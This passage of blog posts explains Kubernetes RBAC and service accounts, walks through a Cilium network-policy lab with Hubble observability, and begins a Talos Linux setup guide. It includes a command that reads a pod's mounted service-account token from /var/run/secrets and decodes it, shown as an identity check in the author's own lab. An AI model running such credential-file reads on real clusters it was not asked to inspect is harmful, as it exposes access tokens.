  ↓
ClusterRoleBinding cluster-admin
  ↓
ClusterRole cluster-admin

Visualized:

Certificate (CN/O) → Authenticated User/Group → ClusterRoleBinding → ClusterRole → Permissions

This is the complete auth-to-RBAC chain that Kubernetes walks through on every API request — from certificate identity to effective privileges.

Users vs. Service Accounts

Until now we’ve been talking about users — real people (or certificates pretending to be). But what about all the API calls in Kubernetes that don’t come from humans, the ones that come from pods.

Pods use service accounts to authenticate. These are actual Kubernetes objects, not external identities.

Users vs Service Accounts

Here is a basic assessment of Users and Service Accounts.

Users:

Represent humans (or external systems).
Not stored in Kubernetes. You authenticate via certificates, tokens, or OIDC, and Kubernetes just trusts what the API server tells it.

Example:

user="kubernetes-admin"
groups=["system:masters","system:authenticated"]

Service Accounts:

Represent workloads.
Are real objects in the cluster:
```
kubectl get serviceaccounts -A
```
Live in namespaces, have tokens, and can be bound to Roles/ClusterRoles.
Example:
```
system:serviceaccount:default:myapp
```

The Default Service Account

Let's take a look at one service account in detail, the Default Service Account. And this will be looking at an nginx container in the default namespace.

Every namespace ships with a default ServiceAccount. If you don’t specify serviceAccountName in your Pod/Deployment, Kubernetes assigns default automatically and projects a short-lived JWT token into the pod.

Verify the default SA exists (and why “Tokens: none” is normal now):

matt@controlplane:~$ kubectl describe sa default -n default
Name:                default
Namespace:           default
Labels:              
Annotations:         
Image pull secrets:  
Mountable secrets:   
Tokens:              
Events:

Which SA is my nginx pod using? This will of course be different per test environment.

matt@controlplane:~$ kubectl get pod nginx-676b6c5bbc-45cmn -o jsonpath='{.spec.serviceAccountName}'
default

See the live token in the pod (identity = service account):

matt@controlplkubectl exec -it nginx-676b6c5bbc-45cmn -- cat /var/run/secrets/kubernetes.io/serviceaccount/token/token
eyJhbGciOiJSUz...

Decode the token payload locally (don’t upload it anywhere):

TOKEN=''
echo "$TOKEN" | cut -d. -f2 | tr '_-' '/+' | base64 -d 2>/dev/null | jq .
# Look for:
#  "sub": "system:serviceaccount:default:default"
#  "iss": "https://kubernetes.default.svc.cluster.local"
#  "kubernetes.io": { "namespace": "default", "pod": { "name": "nginx-..." }, "serviceaccount": {"name":"default"} }

What can this identity actually do?
There are two quick ways to check (without touching the pod):

1) From your admin shell, impersonate the SA for targeted checks:

matt@controlplane:~$ kubectl auth can-i get secrets -n default --as system:serviceaccount:default:default
no
matt@controlplane:~$ kubectl auth can-i list pods -n default --as system:serviceaccount:default:default
no

Or list everything allowed in the namespace:

matt@controlplane:~/rbac$ kubectl auth can-i --list -n default --as system:serviceaccount:default:default
Resources                                       Non-Resource URLs                      Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                                     []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                                     []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                     []               [create]
globalnetworkpolicies.projectcalico.org         []                                     []               [get list watch create update patch delete deletecollection]
networkpolicies.projectcalico.org               []                                     []               [get list watch create update patch delete deletecollection]
                                                [/.well-known/openid-configuration/]   []               [get]
                                                [/api/*]                               []               [get]
                                                [/apis/*]                              []               [get]
                                                [/healthz]                             []               [get]
                                                [/livez]                               []               [get]
                                                [/openapi/*]                           []               [get]
                                                [/openid/v1/jwks/]                     []               [get]
                                                [/readyz]                              []               [get]
                                                [/version]                             []               [get]

Why your nginx can “see” discovery but not much else:
You likely won’t find any RoleBinding/ClusterRoleBinding that names system:serviceaccount:default:default directly. Instead, the default SA inherits low-risk capabilities via groups that all service accounts are in:

system:authenticated
system:serviceaccounts
system:serviceaccounts:default

Check the group-based bindings you have:

kubectl get clusterrolebindings -o json | jq -r '
  .items[] | select(.subjects != null) |
  select(any(.subjects[]?;
    (.kind=="Group") and
    (.name=="system:authenticated" or .name=="system:serviceaccounts" or .name=="system:serviceaccounts:default")
  )) |
  .metadata.name + " -> " + .roleRef.kind + "/" + .roleRef.name
'
# e.g.
# system:discovery -> ClusterRole/system:discovery
# system:basic-user -> ClusterRole/system:basic-user
# system:public-info-viewer -> ClusterRole/system:public-info-viewer

Interpretation:

system:discovery → API discovery endpoints (/api, /apis, /version, etc.)
system:basic-user → “who am I” checks (SelfSubjectAccessReview / RulesReview)
system:public-info-viewer → limited non-sensitive reads
(Add-ons like Calico may add their own minimal reads)

Avoid the Default Lifestyle:

If you want to avoid using this there are a couple options.

Set serviceAccountName explicitly per workload and bind the least privileges it needs.

Or disable auto-token mount when the pod doesn’t need the API:

apiVersion: v1
kind: Pod
metadata: { name: no-api }
spec:
  automountServiceAccountToken: false
  containers: [{ name: c, image: busybox, command: ["sleep","3600"] }]

That's how easy it can be to fix some little things.

Wrap Up

Kubernetes makes access look deceptively simple. Just a kubeconfig here, a service account there. But under the hood it’s a stack of implicit trust.

The API server trusts the CA that signed your client certs.
RBAC trusts whatever identity that cert or token presents.
And you trust that nobody else has the same file sitting on their laptop.

In this post we walked from SSH on the node → kubeconfig certificates → RBAC bindings → default service accounts. Each step added some structure but not much accountability. Kubernetes is excellent at verifying that someone has permission but it just doesn’t always know who that someone actually is.

Kubernetes RBAC might be remedial for many, but it is still something worth exploring in my opinion. Going through this deep dive actually taught me quite a bit. So I hope you found it helpful.

Next up, we’ll look at an option to better manage RBAC. We’ll look at Teleport, a way to bring short-lived, auditable identity into Kubernetes access without rewriting how you work.

Service Boundaries: The Cilium Way

Matt Brown — Tue, 07 Oct 2025 20:50:27 GMT

In Part 2 we leveled up from basic NetworkPolicy to better cluster-wide guardrails using Calico. With global defaults and flow logs, we built something that worked.

That’s a solid foundation. Sounds a bit like what I thought of Network Policies before Calico. But let’s be honest, we’re still only seeing half the picture. Calico and native NetworkPolicy both stop at L4: ports, IPs, and namespaces. Useful, but blind to what’s actually happening inside the connection. Was that a harmless health check or an attacker probing?

This is where Cilium steps in. It takes the same “who can talk to whom” model and extends it into “what can they do once connected.”

L7 enforcement for HTTP, gRPC, Kafka, and DNS.
Identity-aware policies that track labels, not IPs.
Hubble observability so you can see and debug traffic at every layer.

In other words, Cilium isn’t replacing Calico — it’s turning your network policies into application-aware security. Think of it as moving from guardrails to actual understanding. Let's get to it.

Quick note: you’re not going to run Calico and Cilium together. They’re both CNIs, and this series focuses on boundaries, not datapath diplomacy. If you’re already all-in on Calico, this post is more about curiosity than configuration.

What the Hell Is Cilium?

If you’ve spent any time around Kubernetes networking, you’ve seen Cilium pop up. Yes, I said that before about Calico, but it's true. I would describe it as the CNI for cool kids, exuding eBPF goodness. But strip away my sarcasm, and it's actually pretty interesting.

Cilium isn’t just a CNI plugin. It’s a networking, security, and observability platform built on the Linux kernel’s extended Berkeley Packet Filter (eBPF) technology. Instead of using traditional iptables chains or Calico’s Felix agent to program kernel rules, Cilium compiles policies directly into lightweight, event-driven eBPF programs. Check out the link if you’re need an eBPF primer.

At its core, Cilium provides three big things:

Networking — a full CNI that routes packets using eBPF.
Security — identity-based rules that enforce at L3, L4, and now L7.
Observability — deep visibility into traffic, powered by Hubble.

Because enforcement happens in the kernel, Cilium can see and understand every packet and flow, not just the ones that bubble up through Kubernetes Services. That’s what makes features like L7-aware HTTP and DNS policies possible without something like a service mesh.

If Calico was your scalable network policy engine, Cilium is your intelligent network policy engine. It understands intent and context, not just ports and IPs.

Deploying Cilium (ARM-friendly edition)

There are a few ways to set up Cilium for a lab. The easiest is to start with a fresh Ubuntu VM running Kubernetes 1.33. Talos is an option now, but we’ll stick with the usual full-control setup. You can follow along with the Kubernetes on Mac M1 article up to the point where we install Calico. Also, update Kubernetes 1.31 to 1.33 to keep things current.

Start by downloading Cilium and extracting it to /usr/local/bin for easy use. Just to note, we're using ARM, but you can easily swap this out if you're not on this architecture.

matt@ciliumcontrolplane:~$ curl -L --remote-name https://github.com/cilium/cilium-cli/releases/latest/download/cilium-linux-arm64.tar.gz

sudo tar xzvf cilium-linux-arm64.tar.gz -C /usr/local/bin

Then use the following to install Cilium.

matt@ciliumcontrolplane:~$ cilium install --version 1.16.5
ℹ️  Using Cilium version 1.16.5
🔮 Auto-detected cluster name: kubernetes
🔮 Auto-detected kube-proxy has been installed

And don’t forget to remove your taint if you’re doing this on a single-node cluster and haven’t already. I almost always forget this one.

matt@ciliumcontrolplane:~$ kubectl taint nodes --all node-role.kubernetes.io/control-plane-

You can verify everything’s up by checking that the Cilium components are running in the kube-system namespace — or by running a cilium connectivity test. (I tried the test; it tried my patience. I killed it.)

matt@ciliumcontrolplane:~$ kubectl get po -A
NAMESPACE     NAME                                         READY   STATUS    RESTARTS   AGE
kube-system   cilium-9vxrz                                 1/1     Running   0          88s
kube-system   cilium-envoy-rnfsc                           1/1     Running   0          88s
kube-system   cilium-operator-799f498c8-lm989              1/1     Running   0          88s
kube-system   coredns-674b8bbfcf-5lxq8                     1/1     Running   0          6m5s
kube-system   coredns-674b8bbfcf-92xvg                     1/1     Running   0          6m5s
kube-system   etcd-ciliumcontrolplane                      1/1     Running   0          6m12s
kube-system   kube-apiserver-ciliumcontrolplane            1/1     Running   0          6m13s
kube-system   kube-controller-manager-ciliumcontrolplane   1/1     Running   0          6m12s
kube-system   kube-proxy-v97vg                             1/1     Running   0          6m5s
kube-system   kube-scheduler-ciliumcontrolplane            1/1     Running   0          6m13s

Now we're ready to roll.

From Install to Insight — Baseline Cilium Behavior

Now that Cilium’s up and running, let’s see what it actually does out of the box. Turns out not much. So the cool stuff has to wait a little. Like every other Kubernetes CNI, Cilium starts in “wide-open” mode until you tell it otherwise. No policies, no restrictions — a free for all. No different than Calico-world in this regard. Let’s verify that before we start locking things down.

Baseline Connectivity Test

We’ll use the same simple three-tier app we’ve been deploying since Part 1. Save the following as test-app.yaml. Yes, this is long.

apiVersion: v1
kind: Namespace
metadata:
  name: frontend
  labels:
    tier: frontend
---
apiVersion: v1
kind: Namespace
metadata:
  name: backend
  labels:
    tier: backend
---
apiVersion: v1
kind: Namespace
metadata:
  name: db
  labels:
    tier: db
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web
  namespace: frontend
  labels:
    app: web
spec:
  replicas: 1
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
        - name: nginx
          image: nginx:1.27-alpine
          ports:
            - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  name: web
  namespace: frontend
spec:
  selector:
    app: web
  ports:
    - name: http
      port: 80
      targetPort: 80
      protocol: TCP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: api
  namespace: backend
  labels:
    app: api
spec:
  replicas: 1
  selector:
    matchLabels:
      app: api
  template:
    metadata:
      labels:
        app: api
    spec:
      containers:
        - name: nginx
          image: nginx:1.27-alpine
          ports:
            - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  name: api
  namespace: backend
spec:
  selector:
    app: api
  ports:
    - name: http
      port: 80
      targetPort: 80
      protocol: TCP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: postgres
  namespace: db
  labels:
    app: postgres
spec:
  replicas: 1
  selector:
    matchLabels:
      app: postgres
  template:
    metadata:
      labels:
        app: postgres
    spec:
      containers:
        - name: postgres
          image: postgres:15-alpine
          env:
            - name: POSTGRES_PASSWORD
              value: pass
          ports:
            - containerPort: 5432
---
apiVersion: v1
kind: Service
metadata:
  name: postgres
  namespace: db
spec:
  selector:
    app: postgres
  ports:
    - name: pg
      port: 5432
      targetPort: 5432
      protocol: TCP

And apply.

kubectl apply -f test-app.yaml

Then run a quick shell in the frontend namespace and test connectivity.

kubectl run -n frontend test --image=ghcr.io/nicolaka/netshoot -it --rm -- bash

curl -sI http://api.backend.svc.cluster.local
nc -vz postgres.db.svc.cluster.local 5432
dig +short kubernetes.default.svc.cluster.local

You should see something similar to the following.

matt@ciliumcontrolplane:~$ kubectl run -n frontend test --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Mon, 06 Oct 2025 14:32:10 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

test:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.101.1.16) 5432 port [tcp/postgresql] succeeded!
test:~# dig +short kubernetes.default.svc.cluster.local
10.96.0.1

Everything should work: HTTP to backend, TCP to Postgres, DNS lookups. Cilium enforces nothing yet, so traffic flows freely between namespaces and pods. And our test environment is purring (I guess that is more Calico, but you get the point).

Cilium NetworkPolicy Primer

So now let's see what Cilium's got for its NetworkPolicy. Cilium introduces its own CRD: CiliumNetworkPolicy (CNP). It extends Kubernetes NetworkPolicy with L7 context and identity-based enforcement — meaning it can match flows not only by port and IP, but also by service name, HTTP verb, or DNS pattern.

Here’s the simplest possible CNP: a namespace-scoped default-deny. Save the following as cnp-default-deny.yaml. It uses Cilium’s explicit deny fields (ingressDeny and egressDeny) to ensure traffic is actually blocked.

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: cnp-default-deny
  namespace: frontend
spec:
  endpointSelector: {}
  ingressDeny:
    - {} 
  egressDeny:
    - {}

Apply it.

kubectl apply -f cnp-default-deny.yaml

Now all the same curl or dig commands fail. No ingress, no egress, no DNS. Welcome to zero-trust networking. Insert sad face.

Note that unlike a standard NetworkPolicy, leaving ingress and egress empty in Cilium doesn’t automatically enforce a deny-all posture. Cilium only turns on enforcement when a rule or explicit deny exists. The version we used guarantees both directions are blocked until you start carving out allows.

If you’re curious what policies are active, just check the policies.

kubectl get cnp -n frontend

Observing Without Hubble (More on that later)

Right now, we’re flying blind. We have no logs, no flow data, just blocked packets. That’s fine; we’ll turn on Hubble soon for x-ray-vision-level (see the cool kid) insight into what’s happening under the hood. For now, the takeaway is simple: Cilium enforces deny/allow semantics just like Calico or native NetworkPolicy.

But, Cilium can express policies with far more context than ports. For example, an egress rule that allows DNS lookups through CoreDNS, matching on protocol and even query patterns. We’ll come back to this when we enable Hubble.

Rebuilding the Three-Tier Flows Under Cilium

Now that Cilium is enforcing properly, we can mirror the same three-hop app flows we created earlier: frontend → backend → database, plus DNS egress. This will give us a clean baseline before enabling Hubble and exploring L7.

1. Deny-All in Each Namespace

Save the following as cnp-deny-all.yaml. This will shut down all traffic in and out for each of our three namespaces, not just frontend.

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: default-deny
  namespace: frontend
spec:
  endpointSelector: {}
  ingressDeny: [ {} ]
  egressDeny:  [ {} ]
---
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: default-deny
  namespace: backend
spec:
  endpointSelector: {}
  ingressDeny: [ {} ]
  egressDeny:  [ {} ]
---
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: default-deny
  namespace: db
spec:
  endpointSelector: {}
  ingressDeny: [ {} ]
  egressDeny:  [ {} ]

And apply.

kubectl apply -f cnp-deny-all.yaml

2. Allow DNS Egress Globally

Save the following as ccnp-allow-dns.yaml. This will allow CoreDNS to access the outside world. Notice this is a CiliumClusterwideNetworkPolicy. Nothing special, just not namespaced and gives NodeSelector capabilities.

apiVersion: cilium.io/v2
kind: CiliumClusterwideNetworkPolicy
metadata:
  name: allow-coredns-egress
spec:
  endpointSelector:
    matchLabels:
      k8s:io.kubernetes.pod.namespace: kube-system
      k8s:k8s-app: kube-dns
  egress:
    - toEntities:
        - kube-apiserver
      toPorts:
        - ports:
            - port: "443"
              protocol: TCP
    - toEntities:
        - world
      toPorts:
        - ports:
            - port: "53"
              protocol: UDP
            - port: "53"
              protocol: TCP

And apply.

kubectl apply -f cnp-dns-egress.yaml

3. Allow DNS Egress per Namespace

We'll need to also allow each namespace DNS egress. Save the following as cnp-ns-dns.yaml.

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: allow-dns-egress
  namespace: frontend
spec:
  endpointSelector: {}
  egress:
    - toEndpoints:
        - matchLabels:
            k8s:io.kubernetes.pod.namespace: kube-system
            k8s:k8s-app: kube-dns
      toPorts:
        - ports:
            - port: "53"
              protocol: UDP
            - port: "53"
              protocol: TCP
---
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: allow-dns-egress
  namespace: backend
spec:
  endpointSelector: {}
  egress:
    - toEndpoints:
        - matchLabels:
            k8s:io.kubernetes.pod.namespace: kube-system
            k8s:k8s-app: kube-dns
      toPorts:
        - ports:
            - port: "53"
              protocol: UDP
            - port: "53"
              protocol: TCP
---
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: allow-dns-egress
  namespace: db
spec:
  endpointSelector: {}
  egress:
    - toEndpoints:
        - matchLabels:
            k8s:io.kubernetes.pod.namespace: kube-system
            k8s:k8s-app: kube-dns
      toPorts:
        - ports:
            - port: "53"
              protocol: UDP
            - port: "53"
              protocol: TCP

And apply as usual.

kubectl apply -f cnp-ns-dns.yaml

4. App Flows: Frontend → Backend → DB

Save the following as cnp-front-to-back.yaml. This will allow our frontend to reach the backend.

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: front-egress-to-back
  namespace: frontend
spec:
  endpointSelector: {}
  egress:
    - toEndpoints:
        - matchLabels:
            "k8s:io.kubernetes.pod.namespace": backend
            "k8s:app": api
      toPorts:
        - ports:
            - port: "80"
              protocol: TCP
---
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: back-ingress-from-front
  namespace: backend
spec:
  endpointSelector:
    matchLabels:
      k8s:app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            "k8s:io.kubernetes.pod.namespace": frontend
      toPorts:
        - ports:
            - port: "80"
              protocol: TCP

Save the following as cnp-back-to-db.yaml. This will allow our backend to reach the database.

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: back-egress-to-db
  namespace: backend
spec:
  endpointSelector: {}
  egress:
    - toEndpoints:
        - matchLabels:
            "k8s:io.kubernetes.pod.namespace": db
            "k8s:app": postgres
      toPorts:
        - ports:
            - port: "5432"
              protocol: TCP
---
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: db-ingress-from-back
  namespace: db
spec:
  endpointSelector:
    matchLabels:
      k8s:app: postgres
  ingress:
    - fromEndpoints:
        - matchLabels:
            "k8s:io.kubernetes.pod.namespace": backend
      toPorts:
        - ports:
            - port: "5432"
              protocol: TCP

And apply to wrap up all the policies

kubectl apply -f cnp-front-to-back.yaml
kubectl apply -f cnp-back-to-db.yaml

5. Quick Tests

# Frontend → Backend (HTTP)
matt@ciliumcontrolplane:~/blog$ kubectl -n frontend run app --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
app:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Mon, 06 Oct 2025 21:49:48 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

# Backend → DB (Postgres)
matt@ciliumcontrolplane:~/blog$ kubectl -n backend run app --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
app:~# nc -vz postgres.db.svc.cluster.local 5432
Connection to postgres.db.svc.cluster.local (10.101.1.16) 5432 port [tcp/postgresql] succeeded!

I think I did all of the right, but let me know if something is off. This is all pretty similar to what we've done before, but we've got to cover the bases. With traffic restored for the intended paths our app is looking nice and tidy. Onward and upward.

Lighting Up Hubble

We’ve got our service boundaries locked down. Now it’s time to actually see them in action. That’s where Hubble comes in: Cilium’s built-in observability layer that turns packet-level noise into readable flow context. And it just works.

Hubble runs as a Relay (for aggregation) and an optional UI (for pretty visuals).
We’ll use both.

Step 1: Enable Hubble

If you didn’t enable it during install, it’s just one command.

cilium hubble enable --ui

And you should see the following.

matt@ciliumcontrolplane:~/blog$ kubectl get po -n kube-system | grep hubble
hubble-relay-cdd887546-nxcs2                 1/1     Running   0          16h
hubble-ui-69d69b64cf-s6rj7                   2/2     Running   0          16h

This deploys:

hubble-relay – the data service that aggregates flow logs from each Cilium agent
hubble-ui – a lightweight web frontend

Step 2: Access the Hubble UI

Expose it locally (for your Mac in this case) with a NodePort. This makes it accessible directly from your control plane node’s IP. Start by patching the service.

Oh but wait, that doesn't work because of the Operator pattern. This has happened with many tools so let's just create our own service that leaves the others undisturbed. So here is the hubble-service.yaml.

apiVersion: v1
kind: Service
metadata:
  name: hubble-ui-nodeport
  namespace: kube-system
spec:
  type: NodePort
  selector:
    k8s-app: hubble-ui
  ports:
    - name: http
      port: 8081
      targetPort: 8081
      protocol: TCP
      nodePort: 31080
---
apiVersion: v1
kind: Service
metadata:
  name: hubble-relay-nodeport
  namespace: kube-system
spec:
  type: NodePort
  selector:
    k8s-app: hubble-relay
  ports:
    - name: relay
      port: 8090
      targetPort: 8090
      protocol: TCP
      nodePort: 31083

And apply.

kubectl apply -f hubble-service.yaml

Then access the Hubble dashboard at:

http://:31080

That’ll launch the UI dashboard. You’ll start seeing live flow logs:

FORWARDED — allowed by policy
DROPPED — denied by policy
With full context: source → destination, protocol, port, and verdict.

Step 3: Validate Our Flows

Now generate some traffic from the frontend namespace:

matt@ciliumcontrolplane:~/blog$ kubectl -n frontend run test --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl -sI http://api.backend.svc.cluster.local
HTTP/1.1 200 OK
Server: nginx/1.27.5
Date: Tue, 07 Oct 2025 03:25:44 GMT
Content-Type: text/html
Content-Length: 615
Last-Modified: Wed, 16 Apr 2025 12:55:34 GMT
Connection: keep-alive
ETag: "67ffa8c6-267"
Accept-Ranges: bytes

test:~# dig +short google.com
142.251.46.238
test:~# nc -vz postgres.db.svc.cluster.local 5432
^C

Back in Hubble, you’ll see some forwarded and some dropped as expected:

That’s Cilium showing you every flow in the frontend namespace. The graphics are not too bad as well. Easy as you like it.

L7 Enforcement

By now, we’ve seen Cilium handle L3/L4 segmentation cleanly. But the cool kid stuff is application-aware enforcement. It can look inside packets to understand requests by method and path. No sidecars, no service mesh, no YAML sorcery. Just a native policy that says: allow GET /healthz, block POST /admin.

Why L7?

With Calico, policies stopped at “TCP 80 from frontend to backend.” With Cilium, we can go further — controlling traffic by HTTP method, path, etc. That bridges the gap between network isolation and API protection.

Step 1: Create an L7-Aware Policy

Let's simply update our existing cnp-front-to-back.yaml:

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: front-egress-to-back
  namespace: frontend
spec:
  endpointSelector: {}
  egress:
    - toEndpoints:
        - matchLabels:
            "k8s:io.kubernetes.pod.namespace": backend
            "k8s:app": api
      toPorts:
        - ports:
            - port: "80"
              protocol: TCP
          rules:
            http: [{}]
---
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: back-ingress-from-front
  namespace: backend
spec:
  endpointSelector:
    matchLabels:
      k8s:app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            "k8s:io.kubernetes.pod.namespace": frontend
      toPorts:
        - ports:
            - port: "80"
              protocol: TCP
          rules:
            http: [{}]

We've just added the rules section below our ports. Simple. This is not to change anything with regards to allowed flows, but rather give us L7 visibility.

          rules:
            http: [{}]

Apply and test traffic from your frontend namespace:

matt@ciliumcontrolplane:~$  kubectl -n frontend run test --image=ghcr.io/nicolaka/netshoot -it --rm -- bash
If you don't see a command prompt, try pressing enter.
test:~# curl http://api.backend.svc.cluster.local/



Welcome to nginx!



Welcome to nginx!
If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.

For online documentation and support please refer to
nginx.org.

Commercial support is available at
nginx.com.

Thank you for using nginx.


test:~# curl http://api.backend.svc.cluster.local/h

404 Not Found

404 Not Found
nginx/1.27.5


test:~#

The first call should succeed. The second returns a 404. So let's look at Hubble (ignore the double frontend).

L7 policies turn Kubernetes from ports and IPs into users and intent. Instead of treating every HTTP request equally, Cilium gives you relevant info. In our case we just see some Get requests with the specific endpoint, but that is actually pretty useful.

Wrapping Up Cilium

I've just scratched the surface with Cilium, so I'll revisit it in the future. But, the Cilium lab shows what happens when you bring intent and observability into the mix. It understands what's being said. By combining kernel-level eBPF hooks with L7 awareness, you get clarity.

If Calico was about scaling guardrails, Cilium is about seeing and understanding them in real time. You can trace every flow, correlate it to a policy, and confirm that what’s allowed is actually what you meant to allow.

My Key takeaways:

L7 visibility: HTTP and DNS insight without the overhead of a service mesh.
Hubble: observability built-in, not bolted on.

Cilium brings a lot of value.

Ready to Forget `NetworkPolicy`

Three parts, three layers of understanding:

Layer	Tool	Scope	What It Taught Us
L3/L4	NetworkPolicy	Namespace	Basic segmentation
L3–L4+	Calico	Cluster	Global guardrails + visibility
L3–L7	Cilium	Kernel	Context-aware enforcement + observability

Kubernetes service boundaries aren’t about walls. NetworkPolicy gave us the foundation. Calico helped us scale it. Cilium made it slightly more intelligent. That's a wrap for now.

Talos Linux: Simplifying Kubernetes with Minimalist OS

Matt Brown — Tue, 16 Sep 2025 22:47:31 GMT

There’s a certain chaos to most container hosts — which may excite security vendors, but it’s far from ideal in practice. You start with good intentions: run a few workloads, install some debugging tools, tweak a config or two. Before long, your supposedly “minimal” server is a mess of who-knows-what — a setup that almost always ends up demolishing your lab. And that’s without even touching on how permissive and exposed most container hosts are by default, lighting up security tests.

Sound familiar? I wrote this exact same intro when I looked at Flatcar. Now we’re back with our second contender for a minimal OS: Talos Linux.

Talos isn’t a “Linux with Kubernetes on top” story. It’s an immutable operating system built solely for Kubernetes. No shell. No SSH. No apt install. Every change is declarative, version-controlled (or at least it should be), and API-driven. The goal is simple: eliminate snowflake nodes and replace them with a repeatable, locked-down blueprint.

Yes, you can boot it in a toy lab and have NGINX running in minutes. But the real reason Talos stands out is what it refuses to let you do. By stripping away the usual clutter of a Linux host, Talos pushes Kubernetes operators into a world of zero drift, reproducible state, and a dramatically reduced attack surface.

This post isn’t about a “hello world” demo (though we’ll include one). It’s about why Talos makes a compelling foundation for a serious Kubernetes security posture.

Talos Linux Lab

1. Prereqs

UTM installed (https://mac.getutm.app/)
Homebrew with talosctl installed:
```
brew install siderolabs/tap/talosctl
```
Talos ISO downloaded:
- Talos GitHub Releases
- Use metal-arm64.iso for Apple Silicon

2. Create the VM in 7 Steps

Open UTM → Create New VM
Choose Virtualize → Linux
Linux - Browse to metal-arm64.iso
Hardware - Leave default
Storage - Leave default
Shared Directory - Leave default
Name the VM Talos-Controlplane.

3. Boot into Maintenance Mode

Start the VM → Talos boots to maintenance mode (no shell, just logs).
Talos is waiting for you to send a machine config.
Note the VM’s IP address (you’ll need it for talosctl).

4. Generate a Config

Start by assigning the IP address to an environment variable. My IP is below:

`export CONTROL_PLANE_IP=192.168.64.14`

Then grab the disk name and assign it to a variable. Mine is vda:

matt.brown@matt Talos % talosctl get disks --insecure --nodes $CONTROL_PLANE_IP
NODE            NAMESPACE   TYPE   ID      VERSION   SIZE    READ ONLY   TRANSPORT   ROTATIONAL   WWID   MODEL         SERIAL
192.168.64.14   runtime     Disk   loop0   2         66 MB   true
192.168.64.14   runtime     Disk   sr0     4         0 B     false       usb                             QEMU CD-ROM
192.168.64.14   runtime     Disk   vda     2         69 GB   false       virtio      true
matt.brown@matt Talos % export DISK_NAME=vda

Choose any cluster name:

matt.brown@matt Talos % export CLUSTER_NAME=talos_cluster

Then run the following to generate your config:

talosctl gen config $CLUSTER_NAME https://$CONTROL_PLANE_IP:6443 --install-disk /dev/$DISK_NAME

Now edit controlplane.yaml with your network. In my environment if I didn't change it then my DNS endlessly failed on reboot of the cluster controlplane node. eth0 should work and of course your gateway and address will depend on your machine.

machine:
    network:
    # # `interfaces` is used to define the network interface configuration.
      interfaces:
      - interface: eth0
        addresses:
        - 192.168.64.14/24
        routes:
        - network: 0.0.0.0/0
          gateway: 192.168.64.1
      nameservers:
        - 1.1.1.1
        - 8.8.8.8

5. Apply Config and Stuff

Now we are ready to apply it. Send the config in insecure mode (first contact):

talosctl apply-config --insecure --nodes $CONTROL_PLANE_IP --file controlplane.yaml

Talos wipes the disk, installs itself, and reboots into normal mode. Might take a bit of time.

Follow up by adding the endpoint:

talosctl --talosconfig=./talosconfig config endpoints $CONTROL_PLANE_IP

Then go ahead and fire up etcd.

talosctl bootstrap --nodes $CONTROL_PLANE_IP --talosconfig=./talosconfig

6. Bootstrap Kubernetes

Now we're ready to generate our kubeconfig:

talosctl kubeconfig alternative-kubeconfig --nodes $CONTROL_PLANE_IP --talosconfig=./talosconfig
export KUBECONFIG=./alternative-kubeconfig

Check cluster:

matt.brown@matt Talos % kubectl get pods -A
NAMESPACE     NAME                                    READY   STATUS    RESTARTS     AGE
kube-system   coredns-54874b5f94-9d2k9                1/1     Running   0            47h
kube-system   coredns-54874b5f94-zgmzz                1/1     Running   0            47h
kube-system   kube-apiserver-talos-sxp-dta            1/1     Running   0            9h
kube-system   kube-controller-manager-talos-sxp-dta   1/1     Running   3 (9h ago)   9h
kube-system   kube-flannel-64n8t                      1/1     Running   0            47h
kube-system   kube-proxy-67l7n                        1/1     Running   0            47h
kube-system   kube-scheduler-talos-sxp-dta            1/1     Running   4 (9h ago)   9h

You’ll see coredns, kube-apiserver, kube-flannel, kube-proxy, and kube-scheduler. Everything is set, even your CNI.

7. Run Workloads

Untaint the control plane so it can host Pods:

kubectl taint nodes --all node-role.kubernetes.io/control-plane-

Deploy nginx:

kubectl create deployment nginx --image=nginx:stable --replicas=2
kubectl expose deployment nginx --port=80 --type=NodePort
kubectl get svc nginx

Curl from your Mac:

curl http://192.168.64.14:

Hell yeah. Kubernetes the easy way.

Recap

Boot Talos ISO in UTM → node sits in maintenance.
